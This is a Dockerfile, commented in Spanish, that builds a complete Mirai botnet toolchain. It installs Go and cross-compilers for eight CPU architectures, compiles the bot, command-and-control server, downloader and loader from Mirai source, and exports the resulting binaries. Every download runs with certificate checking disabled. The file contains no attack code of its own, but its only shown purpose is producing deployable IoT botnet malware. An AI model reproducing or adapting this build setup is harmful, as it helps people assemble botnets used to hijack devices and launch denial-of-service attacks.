FROM --platform=linux/amd64 ubuntu:22.04

ENV DEBIAN_FRONTEND noninteractive

# Ejecutar todo con bash

RUN rm -f /bin/sh && ln -s /bin/bash /bin/sh

# Instalar paquetes necesarios

RUN apt update && \
    apt install -q -y sudo git gcc wget bzip2 && \
    apt clean autoclean -y && \
    apt autoremove -y && \
    rm -rf /var/lib/apt/lists/*

RUN mkdir -p /tmp

COPY ./tmp/xcomps/ /tmp/

# Instalar Go

RUN cd /tmp && \
    (test -f go1.13.15.linux-amd64.tar.gz || wget -nv https://go.dev/dl/go1.13.15.linux-amd64.tar.gz --no-check-certificate) && \
    tar -C /usr/local -xzf go1.13.15.linux-amd64.tar.gz && \
    rm -f go1.13.15.linux-amd64.tar.gz && \
    export PATH=$PATH:/usr/local/go/bin

ENV PATH "${PATH}:/usr/local/go/bin"

RUN echo "export PATH=\$PATH:/usr/local/go/bin" >> ~/.mirairc && \
    echo "export GOPATH=\$HOME/go" >> ~/.mirairc

# Instalar compiladores cruzados

RUN cd /tmp && \
    (test -f cross-compiler-i586.tar.bz2 ||    wget -nv https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 --no-check-certificate) && \
    (test -f cross-compiler-armv4l.tar.bz2 ||  wget -nv https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 --no-check-certificate) && \
    (test -f cross-compiler-m68k.tar.bz2 ||    wget -nv https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 --no-check-certificate) && \
    (test -f cross-compiler-mips.tar.bz2 ||    wget -nv https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 --no-check-certificate) && \
    (test -f cross-compiler-mipsel.tar.bz2 ||  wget -nv https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 --no-check-certificate) && \
    (test -f cross-compiler-sh4.tar.bz2 ||     wget -nv https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 --no-check-certificate) && \
    (test -f cross-compiler-powerpc.tar.bz2 || wget -nv https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 --no-check-certificate) && \
    (test -f cross-compiler-sparc.tar.bz2 ||   wget -nv https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 --no-check-certificate) && \
    mkdir -p /etc/xcompile && \
    cd /etc/xcompile && \
    tar -jxf /tmp/cross-compiler-i586.tar.bz2 && \
    tar -jxf /tmp/cross-compiler-armv4l.tar.bz2 && \
    tar -jxf /tmp/cross-compiler-m68k.tar.bz2 && \
    tar -jxf /tmp/cross-compiler-mips.tar.bz2 && \
    tar -jxf /tmp/cross-compiler-mipsel.tar.bz2 && \
    tar -jxf /tmp/cross-compiler-powerpc.tar.bz2 && \
    tar -jxf /tmp/cross-compiler-sh4.tar.bz2 && \
    tar -jxf /tmp/cross-compiler-sparc.tar.bz2 && \
    rm -f /tmp/cross-compiler-* && \
    echo "export PATH=\$PATH:/etc/xcompile/cross-compiler-i586/bin" >> ~/.mirairc && \
    echo "export PATH=\$PATH:/etc/xcompile/cross-compiler-armv4l/bin" >> ~/.mirairc && \
    echo "export PATH=\$PATH:/etc/xcompile/cross-compiler-m68k/bin" >> ~/.mirairc && \
    echo "export PATH=\$PATH:/etc/xcompile/cross-compiler-mips/bin" >> ~/.mirairc && \
    echo "export PATH=\$PATH:/etc/xcompile/cross-compiler-mipsel/bin" >> ~/.mirairc && \
    echo "export PATH=\$PATH:/etc/xcompile/cross-compiler-powerpc/bin" >> ~/.mirairc && \
    echo "export PATH=\$PATH:/etc/xcompile/cross-compiler-sh4/bin" >> ~/.mirairc && \
    echo "export PATH=\$PATH:/etc/xcompile/cross-compiler-sparc/bin" >> ~/.mirairc && \
    echo

# Recargar mirairc

RUN echo "source ~/.mirairc" >> ~/.bashrc

# Instalar dependencias de Go

RUN go get github.com/go-sql-driver/mysql && \
    go get github.com/mattn/go-shellwords

RUN mkdir -p /tmp/mirai && \
    mkdir -p /mirai/bin && \
    chmod -R 777 /mirai

# Build bot, cnc, dlr y loader

COPY ./mirai-src/ /tmp/mirai/
COPY ./tmp/bin/ /mirai/bin/

RUN source ~/.mirairc && \
    cd /tmp/mirai/ && \
    (test -f /mirai/bin/cnc || (echo "Compilando mirai..." && bash ./build.sh release telnet && cp /tmp/mirai/release/* /mirai/bin/)) && \
    cd /tmp/mirai/dlr && \
    (test -f /mirai/bin/dlr.x86 || (echo "Compilando dlr..." && bash ./build.sh && cp /tmp/mirai/dlr/release/* /mirai/bin/)) && \
    cd /tmp/mirai/loader && \
    (test -f /mirai/bin/loader || (echo "Compilando loader..." && bash ./build.sh && cp /tmp/mirai/loader/loader /mirai/bin/)) && \
    rm -rf /tmp/*

RUN echo "#!/bin/bash" > /export-bins.sh && \
    echo "cp /mirai/bin/* /bins/" >> /export-bins.sh && \
    chmod +x /export-bins.sh

ENTRYPOINT ["/bin/bash"]
